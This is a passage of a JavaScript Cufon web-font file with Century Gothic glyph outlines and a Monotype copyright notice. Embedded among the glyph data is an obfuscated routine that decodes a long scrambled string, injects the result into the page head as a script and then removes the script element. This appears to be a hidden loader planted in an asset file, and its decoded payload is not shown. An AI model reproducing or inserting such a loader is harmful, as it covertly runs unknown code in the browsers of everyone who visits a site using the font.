110,-110v0,-61,-51,-111,-110,-111v-58,0,-108,51,-108,112v0,59,51,109,108,109","w":394},{"d":"27,-185v31,-28,50,-51,58,-72r9,0v10,22,29,47,59,73r0,13v-24,-11,-42,-22,-54,-34r0,280r-18,0r0,-280v-16,13,-34,25,-54,34r0,-14","w":180},{"d":"118,-196v36,1,59,18,76,40r0,-35r24,0r0,191r-24,0r0,-33v-18,23,-42,36,-77,38v-53,1,-98,-48,-98,-101v0,-53,45,-101,99,-100xm195,-95v0,-42,-34,-78,-75,-77v-45,1,-76,32,-76,77v0,43,32,77,75,77v44,0,76,-30,76,-77xm85,-253v0,-20,18,-37,38,-37v20,0,37,17,37,37v0,20,-17,38,-37,38v-20,0,-39,-17,-38,-38xm142,-253v0,-9,-9,-20,-19,-19v-10,-1,-20,9,-20,19v0,10,10,19,20,19v9,0,19,-10,19,-19xm131,-351r38,0r-52,54r-24,0","w":245},{"d":"144,-102v44,64,-39,141,-104,96v-13,-8,-24,-22,-35,-42r22,-13v15,28,33,42,53,42v27,0,48,-17,48,-44v0,-62,-107,-74,-107,-141v0,-49,54,-76,97,-52v11,6,22,17,34,33r-21,16v-16,-20,-22,-29,-48,-31v-36,-3,-46,46,-19,66v13,9,74,54,80,70","w":179},{"d":"116,-18v39,-2,56,-16,72,-45r21,10v-17,34,-42,57,-91,58v-58,1,-100,-47,-100,-100v0,-54,43,-101,98,-101v56,0,100,43,100,102r-172,0v-1,42,31,78,72,76xm188,-115v-6,-52,-80,-76,-120,-40v-10,9,-17,22,-22,40r142,0xm129,-281r38,0r-52,54r-24,0","w":233},{"d":"137,-259r121,259r-28,0r-41,-85r-111,0r-41,85r-28,0r122,-259r6,0xm134,-204r-45,94r89,0xm145,-333r38,0r-52,54r-24,0","w":266},{"d":"31,-259v81,-1,161,-7,162,68r13,0r0,-71r25,0r0,71v62,5,108,-22,143,21r-16,16v-13,-13,-25,-19,-38,-19v-14,0,-30,11,-29,26v6,46,83,40,83,96v0,59,-85,73,-114,29r15,-18v21,32,72,28,76,-10v-6,-47,-87,-39,-83,-96v0,-9,2,-16,6,-24r-43,0r0,170r-25,0r0,-170r-16,0v-14,51,-63,50,-133,50r0,120r-26,0r0,-259xm166,-190v0,-49,-56,-44,-109,-43r0,87v68,2,109,6,109,-44","w":390},{"d":"20,-246v0,-11,9,-21,20,-21v11,0,20,10,20,21v0,11,-9,20,-20,20v-11,0,-20,-9,-20,-20","w":79},{"d":"91,-216v23,38,50,74,81,110v-16,15,-70,86,-81,110v-12,-22,-38,-59,-80,-110v38,-45,64,-81,80,-110","w":182},{"d":"109,-155r41,0r-3,21r-41,0v-15,67,-8,165,-51,201v-15,13,-32,11,-49,-1r3,-22v37,23,50,-15,56,-56r17,-122r-25,0r3,-21r25,0v10,-43,4,-114,49,-115v10,0,21,3,32,11r-4,24v-25,-25,-39,-9,-45,28","w":199},{"d":"137,-259r121,259r-28,0r-41,-85r-111,0r-41,85r-28,0r122,-259r6,0xm134,-204r-45,94r89,0xm122,-323r24,0r51,45r-31,0r-31,-27r-33,27r-32,0","w":266},{"d":"77,-151r47,-38r0,30r-47,39r0,95r99,0r0,25r-125,0r0,-98r-35,29r0,-30r35,-30r0,-130r26,0r0,108","w":186},{"d":"116,-18v39,-2,56,-16,72,-45r21,10v-17,34,-42,57,-91,58v-58,1,-100,-47,-100,-100v0,-54,43,-101,98,-101v56,0,100,43,100,102r-172,0v-1,42,31,78,72,76xm188,-115v-6,-52,-80,-76,-120,-40v-10,9,-17,22,-22,40r142,0","w":233},{"d":"20,-128v2,-80,56,-135,135,-137v76,-2,137,61,137,136v0,74,-61,136,-135,136v-74,0,-138,-62,-137,-135xm266,-129v0,-65,-47,-111,-110,-111v-63,0,-108,47,-109,112v-1,60,49,111,109,109v65,-1,110,-46,110,-110xm92,-302v33,-42,79,15,116,-12r12,17v-34,39,-86,-20,-117,13","w":312},{"d":"60,-248v-15,1,-22,8,-28,21r-19,0v3,-48,90,-50,93,-2v0,10,-5,18,-16,25v44,17,21,78,-29,78v-32,0,-48,-15,-53,-42r19,0v3,34,68,32,68,-1v0,-21,-19,-23,-44,-25r0,-17v38,7,46,-37,9,-37","w":123},{"d":"18,-94v0,-102,146,-136,195,-58r-19,13v-40,-61,-151,-34,-151,43v0,78,109,104,151,45r19,13v-17,25,-47,43,-89,43v-57,0,-106,-43,-106,-99xm137,-226r-24,0r-51,-45r31,0r31,27r32,-27r33,0","w":232},{"d":"69,-265v49,9,106,12,154,-5r20,0r-188,288r-23,0r171,-262v-22,6,-52,7,-84,7v28,38,-3,94,-50,94v-33,0,-62,-28,-60,-61v1,-35,25,-60,60,-61xm108,-204v0,-21,-19,-39,-39,-39v-20,0,-38,18,-38,39v0,20,18,38,38,38v21,0,39,-17,39,-38xm150,-53v0,-33,28,-61,61,-61v33,0,60,28,60,61v0,33,-28,61,-60,61v-33,0,-61,-28,-61,-61xm249,-53v0,-21,-17,-39,-38,-39v-21,0,-39,18,-39,39v0,21,18,38,39,38v20,0,38,-18,38,-38xm290,-53v0,-33,28,-61,61,-61v33,0,61,28,61,61v0,33,-28,61,-61,61v-33,0,-61,-28,-61,-61xm389,-53v0,-21,-17,-39,-38,-39v-21,0,-39,19,-39,39v0,20,18,38,39,38v20,0,38,-18,38,-38","w":422},{"d":"166,-191r-66,123r74,138r-28,0r-60,-112r-61,112r-26,0r73,-137r-66,-124r27,0r53,98r53,-98r27,0","w":172},{"d":"346,-95r0,8v-21,9,-45,29,-71,59r-14,0v8,-20,19,-38,34,-54r-230,0v15,16,26,34,34,54r-14,0v-26,-30,-50,-50,-71,-59r0,-8v21,-9,45,-29,71,-59r14,0v-8,20,-19,38,-34,54r230,0v-15,-16,-26,-34,-34,-54r14,0v26,30,50,50,71,59","w":360},{"d":"45,-184r-18,0r-4,-81r26,0","w":71},{"d":"-61,7r162,-272r20,0r-163,272r-19,0","w":59},{"d":"31,-259r26,0r0,109r132,0r0,-109r26,0r0,259r-26,0r0,-125r-132,0r0,125r-26,0r0,-259","w":245},{"d":"161,-233r-104,0r0,233r-26,0r0,-259r130,0r0,26","w":166},{"d":"120,-173v-76,1,-68,89,-67,173r-25,0r0,-191r25,0r0,34v17,-22,38,-38,72,-39v87,-1,69,108,70,196r-24,0v-5,-70,22,-174,-51,-173xm5,-169r-14,-7v7,-17,11,-21,13,-41r-16,0r0,-48r32,0v0,41,1,70,-15,96","w":220},{"d":"108,-121r0,-144r25,0r0,135xm108,70r0,-168r25,-10r0,178r-25,0","w":241},{"d":"113,109r0,-203r-116,0r0,-31r116,0r0,-203r31,0r0,437r-31,0"},{"d":"57,-270v41,93,37,257,-7,345r-28,0v45,-87,51,-252,8,-345r27,0","w":132},{"d":"88,67v-49,16,-75,-43,-34,-67r19,0v-14,12,-21,23,-21,34v1,16,18,22,38,18","w":108},{"d":"43,0r-25,0r0,-191r25,0r0,28v15,-23,40,-43,72,-27r-13,21v-75,-15,-56,95,-59,169","w":108},{"d":"195,-190v0,50,-35,70,-90,70r93,120r-32,0r-93,-120r-14,0r0,120r-26,0r0,-259v84,-2,162,-5,162,69xm168,-190v0,-49,-56,-44,-109,-43r0,88v53,1,109,5,109,-45xm133,39v-3,27,-38,33,-66,24r4,-13v21,12,61,-9,29,-16v-3,0,-8,0,-13,2r2,-14v18,-5,46,-2,44,17","w":218},{"d":"119,-173v-76,1,-68,89,-67,173r-25,0r0,-191r25,0r0,34v17,-22,38,-38,72,-39v87,-1,69,108,70,196r-24,0v-5,-70,22,-174,-51,-173xm46,-250v33,-42,79,15,116,-12r12,17v-34,39,-86,-20,-117,13","w":219},{"d":"64,-137v0,52,23,89,60,105r0,32r-102,0r0,-30r65,2v-37,-24,-61,-55,-61,-113v0,-74,43,-121,116,-123v69,-2,115,54,114,123v-1,56,-25,89,-61,113r64,-1r0,29r-101,0r0,-31v79,-24,88,-206,-17,-205v-51,1,-77,43,-77,99","w":276},{"d":"31,-259r26,0r0,109r132,0r0,-109r26,0r0,259r-26,0r0,-125r-132,0r0,125r-26,0r0,-259","w":245},{"d":"44,-259r26,0r0,259r-26,0r0,-259xm13,-265r-5,60r-20,0r-5,-60r30,0","w":97},{"d":"18,-146v4,-55,72,-66,106,-24r-16,16v-21,-26,-62,-26,-68,7v7,45,84,41,84,96v0,59,-86,74,-115,29r16,-18v13,14,26,22,40,22v18,0,35,-14,35,-32v-4,-47,-86,-40,-82,-96xm70,-281r38,0r-52,54r-24,0","w":139},{"d":"158,-265v47,0,88,27,110,57r0,-51r147,0r0,26r-121,0r0,80r121,0r0,26r-121,0r0,102r121,0r0,25r-147,0r0,-50v-29,34,-54,55,-111,57v-74,2,-138,-61,-137,-135v1,-80,59,-137,138,-137xm267,-130v-1,-65,-48,-107,-110,-110v-56,-2,-109,53,-109,110v0,60,50,111,111,111v59,0,109,-52,108,-111","w":429},{"d":"39,-262r33,0r0,133r-19,0r0,-116r-26,0","w":119},{"d":"20,-141r178,0r0,24r-178,0r0,-24","w":218},{"d":"158,-17v0,-27,44,-28,44,0v0,12,-10,22,-22,22v-12,0,-22,-10,-22,-22xm38,-17v0,-27,44,-28,44,0v0,12,-10,22,-22,22v-12,0,-22,-10,-22,-22xm278,-17v0,-27,44,-28,44,0v0,12,-10,22,-22,22v-12,0,-22,-10,-22,-22","w":360},{"d":"12,-259r28,0r86,200r87,-200r28,0r-113,259r-5,0","w":252},{"d":"9,-191r27,0r63,139r64,-139r26,0r-87,191r-5,0","w":199},{"d":"193,-129v0,66,-55,72,-136,69r0,60r-26,0r0,-259r26,0r0,61v78,-3,136,2,136,69xm166,-129v0,-50,-56,-45,-109,-44r0,88v53,1,109,6,109,-44","w":213},{"d":"108,5v-98,0,-84,-101,-84,-196r25,0v3,75,-18,178,59,172v46,-3,58,-23,58,-83r0,-89r26,0v0,0,14,196,-84,196xm98,-271r24,0r51,45r-31,0r-31,-27r-33,27r-32,0","w":218},{"d":"154,-5v35,47,-26,97,-86,76r7,-22v35,13,87,-13,54,-41v-6,-4,-18,-9,-36,-12v-48,-9,-72,-37,-72,-85v0,-76,51,-106,108,-154r-88,0r0,-22r119,0r0,22v-60,56,-114,77,-114,152v0,43,17,57,58,66v27,6,44,11,50,20","w":167},{"d":"108,5v-98,0,-84,-101,-84,-196r25,0v3,75,-18,178,59,172v46,-3,58,-23,58,-83r0,-89r26,0v0,0,14,196,-84,196","w":218},{"d":"260,-94r-263,0r0,-31r116,0r0,-203r31,0r0,203r116,0r0,31"},{"d":"233,-170r-39,0r0,170r-25,0r0,-170r-97,0r0,170r-24,0r0,-170r-39,0r0,-21r224,0r0,21","w":241},{"d":"31,-259r26,0r0,234r100,0r0,25r-126,0r0,-259xm116,39v-3,27,-38,33,-66,24r4,-13v21,12,61,-9,29,-16v-3,0,-8,0,-13,2r2,-14v18,-5,46,-2,44,17","w":166},{"d":"135,-271v80,0,138,58,138,138v0,80,-58,138,-138,138v-80,0,-139,-58,-139,-138v0,-80,58,-138,139,-138xm135,-14v68,0,118,-49,118,-119v0,-70,-50,-119,-119,-119v-68,0,-118,51,-118,119v0,69,50,119,119,119xm62,-132v0,-68,69,-108,120,-70v13,9,19,24,20,40r-24,0v-4,-20,-18,-32,-41,-32v-33,1,-49,25,-49,62v0,68,88,82,90,17r24,0v-4,36,-29,63,-67,63v-46,0,-73,-32,-73,-80","w":268},{"d":"24,-191r25,0r0,191r-25,0r0,-191","w":72},{"d":"121,7v-63,0,-89,-33,-89,-109r0,-157r26,0r0,157v-5,59,16,84,61,84v93,0,49,-150,59,-241r26,0v-5,112,31,266,-83,266xm129,-333r38,0r-52,54r-24,0","w":235},{"d":"31,-259r130,0r0,26r-104,0r0,81r104,0r0,25r-104,0r0,127r-26,0r0,-259","w":174},{"d":"27,-191r25,0r0,80r89,-80r34,0r-97,87r105,104r-35,0r-88,-88r-8,6r0,82r-25,0r0,-191","w":180},{"d":"20,-129v-1,-78,39,-136,116,-135v74,0,114,56,113,136v0,78,-36,135,-113,135v-81,-1,-115,-54,-116,-136xm213,-131v0,-58,-24,-105,-77,-105v-57,1,-81,42,-80,106v1,64,19,109,78,109v58,0,79,-44,79,-110xm86,-146r97,0r0,30r-97,0r0,-30","w":268},{"d":"32,0r0,-259r5,0r172,198r0,-198r26,0r0,259r-6,0r-171,-195r0,195r-26,0xm146,-278r-24,0r-51,-45r31,0r31,27r32,-27r33,0","w":266},{"d":"18,-96v0,-69,73,-125,141,-89v-11,-15,-24,-28,-38,-41r-38,16r-9,-19r31,-13v-11,-9,-21,-17,-29,-23r34,0v6,4,12,9,18,14r29,-12r9,18r-20,9v40,38,72,77,72,136v0,62,-41,103,-101,105v-54,2,-99,-47,-99,-101xm192,-96v0,-46,-28,-77,-72,-77v-41,0,-77,32,-77,76v0,42,34,79,75,78v43,-2,75,-31,74,-77","w":235},{"d":"18,-93v0,-66,44,-96,116,-95r105,1r0,27r-60,0v52,52,20,165,-67,165v-58,0,-94,-38,-94,-98xm168,-94v0,-40,-16,-75,-56,-74v-39,0,-58,26,-58,78v0,39,18,71,57,71v41,-1,57,-31,57,-75","w":245},{"d":"28,-259r26,0r0,259r-26,0r0,-259xm52,-333r38,0r-52,54r-24,0","w":81},{"d":"121,7v-63,0,-89,-33,-89,-109r0,-157r26,0r0,157v-5,59,16,84,61,84v93,0,49,-150,59,-241r26,0v-5,112,31,266,-83,266","w":235},{"d":"249,-126v0,81,-45,128,-135,126r-83,0r0,-259r54,0v111,-3,164,38,164,133xm223,-126v0,-89,-61,-113,-167,-107r0,209v104,5,167,-13,167,-102xm129,-278r-24,0r-51,-45r31,0r31,27r32,-27r33,0","w":267},{"d":"18,-95v0,-54,45,-101,100,-101v54,0,99,45,99,101v0,54,-44,100,-99,100v-55,0,-100,-46,-100,-100xm192,-95v2,-40,-35,-77,-74,-77v-39,0,-77,36,-75,77v1,44,31,77,75,77v44,0,72,-33,74,-77xm79,-268v12,24,66,25,78,0r23,0v-9,49,-116,49,-125,0r24,0","w":235},{"d":"85,-133v0,-11,10,-20,21,-20v11,0,20,9,20,20v0,11,-9,21,-20,21v-12,0,-21,-9,-21,-21","w":119},{"d":"331,0r-304,0r0,-191r25,0r0,168r106,0r0,-168r25,0r0,168r105,0r0,-168r25,0r0,168r42,0r0,53r-24,0r0,-30","w":360},{"d":"79,-271r24,0r51,45r-31,0r-31,-27r-33,27r-32,0","w":180},{"d":"20,-128v2,-80,56,-135,135,-137v76,-2,137,61,137,136v0,74,-61,136,-135,136v-74,0,-138,-62,-137,-135xm266,-129v0,-65,-47,-111,-110,-111v-63,0,-108,47,-109,112v-1,60,49,111,109,109v65,-1,110,-46,110,-110","w":312}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+-1067-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("z@CbZ>E%]|k.z~1o(>s):@:kO!EbC>k.O!,)]|aHCiFAg+%LO[K)E|K!O[Kmf+j5O[KmE_,}O[Kmf+1LO[KmE_:bO[Kmf@E#O[Kmf@UVO[Kmf+j)q1Dbf_M+CU5&(d:+f_,&(dtmg#}&(ds1C#E&(dt)C@E&(dt+g#,&(dtDC>ijO[Kmf|C}O[KmfdM!O[Kmfdf8O[KmE_E>O[Kmf+jmO[K)f#s>O[KmE_iLO[KmfdaLO[Kmfd&VO[KmE_tVJsDbf_UmC1Dbf_f5giDbf_E#CiDbf#6}gbDbf#f)fiDbf_6>CsDbf_UVEsDbf_,#yiDbf_f8CiDbf_M+ysDbf_E#giDbf_f5EiDbf_6>CiDbf_M%fiDbf_U+EbDbf_E}CL6&(dt+g|i&(dtDE#C&(dt+g+}&(dtmg!i&(dt+g#i&(d:bg|s&(dtDf@s&(dt%f_1&(dt+y_}&(dt+gds&(dt+gd(&(dt+gdC&(dt+g!a&(dtDfd(&(dtmC_6&(|gmf_E&(d:bg!,&(d:bE#foO[Kmf@i>Z1Dbf_E}fsDbf_M%f1Dbf_UDEiDbf_61EbDbC>:mf1Dbf_UVCiDbf_U)EsDbf_UbCsDbf_UDE1Dbf_f5CsDbf_E}ysDbf_UbEiDbf_ELCHa&(dtDf+i&(|gmf_,&(dt+g|a&(dtmg|C&(dtDE|i&(dtDE|E&(dt+g|E&(dtDE+6&(dt+y_j5O[Kmfd:)O[Kmf@E}O[K)f_E}O[K)Ed}#O[Kmfd:DO[KmE_:!O[KmE_UbO[Kmf@C>fj1&(d:by_}&(d:)E#i&(dtDf#6&(dt+g+1DO[Kmf!fbO[KmfdU+O[KmfdtmO[Kmfd,}O[Kmfd&bO[i>f_tmO[Kmf@,jO[K)E#CLO[KmfdU)O[Kmfdg5O[KmE_f5O[K)EdUmO[i>f_tDO[KmE_:+O[Kmf!,}O[Kmf!,jO[KmE_U+O[Kmf|CjO[K)Edj)O[KmfdK5O[Kmf!:DO[Kmfd:b]sDbf#tVC1Dbf_U!g1Dbf_MbEbDbf_UmEsDbf_E}g1Dbf_UVC1Dbf_f8EsDbf_U%gbDbf_U!f1Dbf_MmE1Dbf_M)EbDbf|K8fiDbf_6#fbDbf#i}g1Dbf_6}CsDbf#tDyiDbf#t+CiDbf_UbC1Dbf_6jE1Dbf_U+giDbf_U)E+i&(dtDf>E&(dtDf>a&(d:mf!E&(dtmC|,&(dtDfd1&(d:!E_,&(d:mf|i&(dt%fdC&(dt+y@E&(d:mf|E&(dtDE#}&(dt+y|EOO[K)f#U5O[Kmf@i1O[Kmfda1O[K)EdK!O[Kmf!:mO[Kmfd,1O[K)EdKVO[KmfdKVO[K)E#g+O[KmE_UDO1Dbf_M%gbDbf#g+g1Dbf_UVf1Dbf#tDg1Dbf_U+yiDbf_M%CiDbf#K!EiDbf#KbfLD&(dt%E_C&(dt%f+i&(dt%E_(&(d:!f!s&(d:bfda&(dt%f@s&(d:bEd}&(d:DfdC&(dtDfds&(d:bE|i&(dt+yd}&(d:bgds&(dt%f+C&(dt%E_E&(dt%Ed,aO[K)EdE#O[K)fdtbO[i>fdtVO[K)EdjmO[KmfdgmO[K)Edi}GsDbC#tmEsDbf#K!gimYO[K)Edg%C1Dbf_MDg1Dbf_U!CiDbf_M+E)a&(dtDE+1&(dtDf_C&(dtDf_s&(dtDE>a&(d:bEd6&(d:bEdE&(d:bf|EUKsDbf_M+fsDbf#K8EsDbf#6}EsDbf_MmC1Dbf#KbyiDbf_ELEbDbf#Kbg1Dbf_U)E1Dbf_MDEbDbf_E#E1Dbf#UbC_b#O[i>fdt+O[Kmf@f!O[KmE_M%O[Kmf>M8O[KmfdM8O[Kmf@g%O[K)fdiLO[K)EdCLO[KmE_,jO[KmfdajO[K)Edg!O[i>g#tDO[Kmf+(1O[K)f_f)O[KDC|g)O[Kmf@gbO[KmE_:8O[KmE_:5O[KmE_K!O[Kmfdt5O[KmE_f)O[KmE_aLO[Kmf@:%O[K)Edj+O[Kmf@,LO[Kmf!U%O[KmE_,#O[K)Edi#MsDbf_UVysDbf_6>gbDbf_ELysDbf_M+CiDbf_M)g1Dbf#iLf1Dbf_6jysDbf_MbyiDbf#g+gbDbf#K!fsDbC#tmEiDbf_6}EsDbf#:DEiDbf_U!EiDbf_UVgbDbf_f8C1Dbf|K8E~s&(dt%fd1&(d:bg+a&(dt%fd}&(d:)f>,&(d:bC_}&(d:by_6&(dt%f|s&(dtDEd}&(dt%f+s&(dt%Ed}&(d:Df>i&(dt%E|s&(dt%f_}&(dt%f#,&(dtmg#,&(dt+y|i&(dtmC>s&(dt+y_CHO[KmE_6#O[KmE_s>O[Kmf!f)O[KmE_i#]bDbf_61fsDbf_M%fsDbf_U!EbDbf_f5EsDbf_61EiDbf_f8EbDbf_6>E1Dbf|K8fsDbf_M%ysDbf#tDEiDbf_M+g1Dbf_E}EiDbf_M5fiDbf_61fiDbf#K5fiDbf_M+gbDbC#UmfsDbf_M%C1Dbf_UVfbDbf_MbfbDbf_MbC1Dbf#:!fiDbf_6jyiDbf_6jf1Dbf_6}y[(&(d:mf#,&(dtDEdsoO[Kmf@ij|bDbf_6}CiDbf_M)fiDbf_6LCiDbf_UDgbDbf_ELCiDbf_6jCj(&(dtDf+,&(dtDE#s&(dtDf@E&(dtDE_,9O[Kmf@g)O[Kmf@K8&sDbf_61giDbC#UmysDbf_6#C1Dbf#g!fsDbf#UbCiDbf_MbfiDbf_ELEsDbf_6jgbDbf_6jfiDbf_61f#a&(dt%f@iFO[Kmf@:!O[KmE_s1O[KmE_i1O[Kmf@,>O[Kmf!ELO[KmE_sjzsDbf_M%CsDbf#U5f1Dbf_Mmf)2&(dt+gd1&(dtmC@,&(dtmC_a&(ds1y_i&(dt)C@a&(d:!E#KWZsDbf_M)C1Dbf_6jCsDbf_6>EbDbf_6Lf[1&(d:)fds&(dt%f+E&(dtDf_KmO[KmfdE1O[Kmf@M+O[KmE_f%O[Kmf@sLMiDbf#:DgiDbf_6LfiDbf_6}fsDbf#:mC1Dbf#tDC[E&(dtmgdi&(dt%f#a&(ds1y_E&(dtDEdfIO[Kmfd:5O[Kmf!s}M%2&(d:bg>E&(d:!E_6&(d:bE#(&(d:bE#s&(d:bE#,&(d:!E>s&(d:+fd6&(d:bgd6&(d:bC_1LO[KmfdEjO[K)f#t!ZiDbf#:DCiDbf#s}ysDbf#U5f~E&(dtmCdC&(d:mf+E&(dt%fd,&:#C&(dtmg|s&(dtmg>s&(d:bg>s&(d:bEds&(d:)f_,&(d:bE>E&(dtmg+(&(dtmgd,^O[KmfdC#ysDbf_U+fsDbf_s>gbDbf#KbCsDbf|K8fji&(d:+f#6}O[Kmfd(jeiDbf_UDCiDbf_E#gbDbf_MDEsDbf_UbEsDbf#U5fbDbf#tDysDbf_MbEsDbf#:)yKk&(d:DE|E&(d:bf>EKZ+s&(|gDf_,&(dtmCda&(d:bEdM2O[Kmf>a}O[K)f#M8O[KmfdMmO[Kmfdt6~_Us@[:,z=fEyGMaqdKi|OgC]Z&(Jew}L#j1>H7^S4A2.YmD)+%b!V85WoFk9Ig+O[Kmfdf%O[KmfdC>O[Kmfdf+O[Kmf@g5O[Kmf@K+O[K)E|E}M1Dbf#K!ys,&(dtDE!,]O[Kmf@s#O[i>f_t!O[K)f_:DO[Kmfds}O[K)EdU8O[Kmf@MV|sDbf#i}gbDbf#KbC1DbC#UmEsDbf_f5E1Dbf_UDg1Dbf#KmgbDbf_6>ysD&O[Kmf+jD]1Dbf_UVfiDbf_U%EiDbf#t+yiDbf_UmysDbf_UDfsDbf_Umg#E&(dtDf!C&(dt%f#6&(dtDE+C&(dtDf|aEO[Kmfdt)O[Kmf@f8O[Kmf@f5O[KmfdU8O[K)fdjbO[Kmfdt+O[Kmf@fbO[Kmf@f%O[Kmf!f+EbDbf_,#EbDbf#UDfbDbf_UDEsDbf#KmfsDbf_6}fbDbf#i#C#5&(dt%E_i&(d:bE#1&(dt%f_,wO[K)f_U%O[KmfdtVO[KmE_s#O[Kmf|C>OiDbf_U)y[^&(dtDE>s&(d:mfd(&(dtDf+C&(dtDEd6&(dtDf|C&(dt%yd6&(dt%f_U>O[Kmf!fDz1Dbf_U%EsDbf#:!EsDbf#KbEiDbf_61gbDbf_ELyiDbf_E}fbDbf_f8EiDbC#UmEiDbf_U%gKDdO[Kmfd:+O[K)f_U+O[Kmfd(}O[KmfdM+O[Kmfdg%O[Kmf@g+=1Dbf_UbgiDbf_U)g1Dbf_U+gbDbf#6}fbDbf#tDgiDbf#U)f1j1ObDbf_MmEsDbf_MDfsDbf_M%giDbf_E#EsDbf_6LEiDbf#:!fsDbf_ELfbDbf#t)fsDbf_ELg1Dbf_U)C1Dbf#Kmf1Dbf_Mmg1Dbf_6LgbDbf_6#g1Dbf_6}fiDbf_MbEiDbf_6#fsDbf_ELgbDbf_M)CiDbf#U5fiDbf_s>g1Dbf_MmEiDbf_61yiDbf_6#fiDbf#6}EbDbf_,jyiDbf#g!E1Dbf_U5f1Dbf_6#f1Dbf_U%f|i&(dtmC_i&(dtmg#E&(dtDf@a&(d:mf+6&(dt+g+(&(d:DydMHO[K)f_M%qsDbf_f5fbDbf_U%yiDbf_6}E1Dbf#K)E~1&(dt)C@,)O[KmfdK!O[Kmf@gDO[K)fd:!O[Kmf+jVO[Kmf+}}O[KmfdiLO[KmfdK)O[Kmf@:5O[K)f#U)O[K)f_:!iHC&(dtmC@i&(dtmC>,&(dt+g#CbO[K)Edf%O[Kmf!fmO[KmfdELO[Kmf@U5O[KmfdfDO[Kmf@a}a1Dbf_M+giDbC#UmfiDbf_U%EbDbf_6>fsDbC#UmE1Dbf_6#Csi&(dtDf@i&(dtDE@C&(dtmg#(&(dt%E_1&(dt)g+C&(dt+y|gL=HEmZ@1%z~:LzqD^GdtA&_bL=HtAZ_bm=>D1Z>(%]~DHG|:.CL5HZ[1m][fkJV%o]|g7gL5Y]+%YOLwIyH(V(bm.zdF7G+^S(|a^(@}&=>5^&>,&=>51([DS(|a^(@}.]|^Ag|5jO~5#Z!%^,~k^=Ha1&VM7Z@k#gOa^Z!8.]@k+(@5}Z|K^z|CY&Lwo]dDAy)A4]q1H|!EZ]ib(GO6Z]ibkzqw^")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":256,"face":{"font-family":"century gothic","font-weight":400,"font-stretch":"normal","units-per-em":"360","panose-1":"2 11 5 2 2 2 2 2 2 4","ascent":"288","descent":"-72","x-height":"5","bbox":"-61 -382 415 110","underline-thickness":"20.918","underline-position":"-24.2578","unicode-range":"U+0020-U+F108"}}));
/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * Typeface Â© The Monotype Corporation plc. Data Â© The Monotype Corporation plc /
 * Type Solutions Inc. 1990-91 All Rights Reserved
 * 
 * Trademark:
 * Century Gothic is a trademark of The Monotype Corporation plc.
 * 
 * Description:
 * A design based on Monotype 20th Century, which was drawn by Sol Hess between
 * 1936 and 1947. Century Gothic maintains the basic design of 20th Century but has
 * an enlarged 'x' height and has been modified to ensure satisfactory output from
 * modern digital systems. The design is influenced by the geometric style sans
 * serif faces which were popular during the 1920's and 30's. Useful for headlines
 * and general display work and for small quantities of text, particularly in
 * advertising.
 * 
 * Manufacturer:
 * Monotype Typography, Inc.
 * 
 * Designer:
 * Monotype Type Drawing Office
 * 
 * Vendor URL:
 * http://www.monotype.com/html/mtname/ms_welcome.html
 * 
 * License information:
 * http://www.monotype.com/html/type/license.html
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"16,-141v-2,-61,97,-72,125,-24r-29,30v-12,-12,-23,-18,-33,-18v-11,-1,-22,9,-15,19v30,21,81,31,81,79v0,68,-105,79,-136,27r30,-32v10,18,53,35,61,7v3,-11,-24,-24,-37,-30v-31,-16,-47,-35,-47,-58","w":158},{"d":"171,-61v3,72,-76,61,-147,61r0,-191r48,0r0,69v60,-4,98,8,99,61xm72,-37v25,1,48,1,48,-22v0,-24,-23,-25,-48,-24r0,46","w":183},{"d":"7,-191r178,0r0,45r-63,0r0,146r-48,0r0,-146r-67,0r0,-45","w":192},{"d":"183,-184v-3,56,-35,77,-104,74r0,110r-50,0r0,-259v82,-3,158,-1,154,75xm135,-184v0,-26,-26,-26,-56,-26r0,52v30,1,56,2,56,-26","w":201},{"d":"264,-44r0,-215r50,0r0,215r53,0r0,83r-46,0r0,-39r-296,0r0,-259r50,0r0,215r69,0r0,-215r50,0r0,215r70,0","w":368},{"d":"296,-131v1,67,-48,104,-116,105r0,26r-50,0r0,-26v-67,-6,-115,-38,-116,-105v-1,-63,54,-102,116,-105r0,-23r50,0r0,23v64,4,115,41,116,105xm180,-191r0,120v44,-4,66,-24,66,-60v0,-36,-22,-56,-66,-60xm130,-191v-44,4,-66,24,-66,60v0,35,22,56,66,60r0,-120","w":309},{"d":"19,-191r48,0r0,191r-48,0r0,-191xm-21,-251v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25xm57,-251v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25","w":86},{"d":"114,-196v63,1,107,45,102,114r-154,0v3,46,71,60,101,26r40,19v-18,26,-44,42,-86,42v-59,0,-102,-44,-102,-100v0,-56,44,-102,99,-101xm168,-120v-10,-45,-92,-48,-104,0r104,0xm51,-251v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25xm129,-251v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25","w":230},{"d":"101,-150v-37,-16,-40,29,-40,73r0,77r-48,0r0,-191r41,0r0,24v9,-22,35,-37,62,-24","w":115},{"d":"30,-259r50,0r0,89r70,-89r59,0r-90,116r99,143r-59,0r-79,-115r0,115r-50,0r0,-259","w":223},{"d":"25,-276r53,0r20,23r19,-23r52,0r-52,50r-39,0","w":194},{"d":"26,-259r49,0r0,259r-49,0r0,-259","w":100},{"d":"100,-295r57,0r-65,69r-34,0xm178,-295r57,0r-64,69r-35,0","w":252},{"d":"19,-191r48,0r0,191r-48,0r0,-191xm-7,-226r0,-39r101,0r0,39r-101,0","w":86},{"d":"49,0r0,33r-43,0r0,-74r29,0r66,-150r31,0r67,150r29,0r0,74r-46,0r0,-33r-133,0xm148,-41r-31,-80r-33,80r64,0","w":